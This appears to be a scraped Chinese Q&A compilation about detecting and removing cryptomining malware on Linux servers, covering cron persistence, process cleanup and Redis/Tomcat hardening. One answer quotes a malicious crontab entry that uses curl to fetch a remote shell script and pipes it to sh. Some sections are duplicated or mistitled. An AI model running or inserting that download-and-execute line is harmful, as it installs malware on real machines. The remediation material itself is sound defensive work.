如何知道自己的伺服器被挖礦

『壹』 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

『貳』 請教大神，伺服器被挖礦程序入侵如何排插

重裝系統，並做好安全加固是最好的辦法。
如果非要排查，也簡單，你看系統進程，是否有不常見的就知道了。
不過自己處理安全，一般都無法徹底，建議還是找專業安全公司（如護衛神）好些。

『叄』 伺服器好像被挖礦了，wnTKYg，怎麼弄

之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。

『肆』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『伍』 伺服器被下挖礦了怎麼辦

哥們被下了啥挖礦？去舉報啊。之前流量礦石非常火的時候，我的伺服器也被無良黑了，成了肉雞，然後我去找到他的信息，截圖跟流量礦石舉報，就幫我處理了。你看你的被下了啥，就去找他們處理。

『陸』 伺服器被rshim挖礦病毒攻擊後 HugePages_Total 透明大頁怎麼都清不掉 一直佔用內存 球球

問題定位及解決步驟：

1、free -m 查看內存使用狀態 ，發現free基本沒了。--> 懷疑是服務有內存泄漏，開始排查

2、使用top命令觀察，開啟的服務佔用內存量並不大，且最終文檔在一個值，且服務為java應用，內存並沒達到父jvm設置上限。按top監控佔用內存排序，加起來也不會超過物理內存總量。查看硬碟使用量，佔用20%。基本排除虛擬內存佔用過大的原因。--->排除服務內存泄漏因素，懷疑mysql和nginx，開始排查

3、因為top命令看 mysql佔用內存也再可控范圍，是否存在connection佔用過多內存，發現並不會，設置最大連接數為1000，最多也不會超過幾M。 nginx佔用一直非常小。但每次最先被kill的基本都是nginx進程。所以排查，但發現無非就是openfiles數量啥的調整。發現也一切正常。且之前niginx可以正常使用的。

4、最為費解的就是 通過free -m 查看的時候 基本全是used，cache部分很少，free基本沒有。但top上又找不到有哪些進程佔用了內存。無解

5、注意到有兩個進程雖佔用內存不多，但基本耗光了100%的cpu。開始想著佔cpu就佔了，沒占內存，現在是內存不不夠導致進程被kill的，就沒注意這點。

6、實在搞不定，重啟伺服器，重啟了所有服務，服務暫時可用，回家。在路上的時候發現又崩了。忐忑的睡覺。

7、早上起來繼續看，這次留意注意了下那兩個佔用高cpu的進程，kdevtmpfsi 和 networkservice。本著看看是啥進程的心態，網路了下。真相一目瞭然，兩個挖礦病毒。

突然後知後覺的意識到錯誤原因：

1、cpu佔用率高，正常服務使用cpu頻率較高的服務最容易最內存超標。（因為在需要使用cpu時沒cpu資源，內存大量佔用，服務瞬間崩潰），然後看top發現剛剛已經佔用內存的進程已經被kill了，所以沒發現內存有高佔用的情況。
2、後面的應用繼續使用cpu時也會發生類似情況，倒是服務一個一個逐漸被kill。

問題點基本定位好了，解決問題就相對簡單很多：
通過網路，google，常見的病毒清除步驟基本都能解決。這兩個挖礦病毒很常見，大致記錄下要點。可能所有病毒都會有這些基礎操作。

① 首先，查看當前系統中的定時任務：crontab -l
我伺服器上有四個定時下載任務 通過wget 和 curl 下載病毒文件，把異常的刪掉。要不然刪了病毒文件還是會下載下來
crontab -r，全部刪除命令（或根據需求刪除定時任務）

② 查找病毒文件 可以全部模糊搜索 清除， 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 後再使用rm -f filename 。可刪除

③ kill 病毒進程，但注意kill了可能馬上就重啟了。因為有守護進程，需要把病毒進程的守護進程也kill掉

④ 檢查是否root用戶被攻擊，可能系統配置信息被更改。

⑤ 最好能理解病毒腳本，通過看代碼看它做了些什麼。針對腳本取修復系統。

『柒』 怎麼找到linux 伺服器 挖礦軟體

今天早上起來一看，伺服器腳本一個都沒有啟動!甚是奇怪，遠程登錄伺服器，也是異常的卡，直到最後卡死，只好重新啟動伺服器!啟動之後沒一會又會變卡，越來越卡，top查看進程！不覺又奇怪的進程，因為平常也不經常看！所以自己也搞不明白怎麼回

『捌』 我的世界伺服器檢查挖礦記錄的指令是什麼

首先要知道伺服器有沒有這插件

『玖』 如何用Linux伺服器挖礦教程

今天早上起來一看，伺服器腳本一個都沒有啟動!甚是奇怪，遠程登錄伺服器，也是異常的卡，直到最後卡死，只好重新啟動伺服器!
啟動之後沒一會又會變卡，越來越卡，top查看進程！不覺又奇怪的進程，因為平常也不經常看！所以自己也搞不明白怎麼回事兒！只好到群里問了問，說是被挖礦的掛了木馬文件了，是由於redis的漏洞!
後來我自己發現，原來redis遠程可以直接登錄，原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢，看來是我想多了
看了好長時間才發現一個異常的進程，自啟的進程 molibe ！
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下，打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下，cat root 查看定時器的執行發現之前腳本都被改了，顧不得刪除cron，service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了！但是根本是因為redis漏洞，所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)

『拾』 如何查看電腦是否被植入了挖礦程序

如何判斷自己的電腦是否被挖礦，怎樣預防？
電腦開機後，所有程序都不打開的情況下。按Ctrl+ALT+Del調出任務管理器，在「進程」卡項中，查看CPU的使用情況。如果看到某個進程佔用了大量的cpu使用情況，並且幾分鍾後都沒有降低的趨勢，這個程序就可能是病毒了。
想要預防自己的電腦被挖礦也很簡單，只要安裝正規的安全軟體，使用安全的瀏覽器，添加安全合適的插件，就可以防止電腦被挖礦了。
當然，如果不瀏覽不正規不健康的網站，不下載盜版游戲，盜版軟體等就更能從根源杜絕電腦被不法分子挖礦的風險。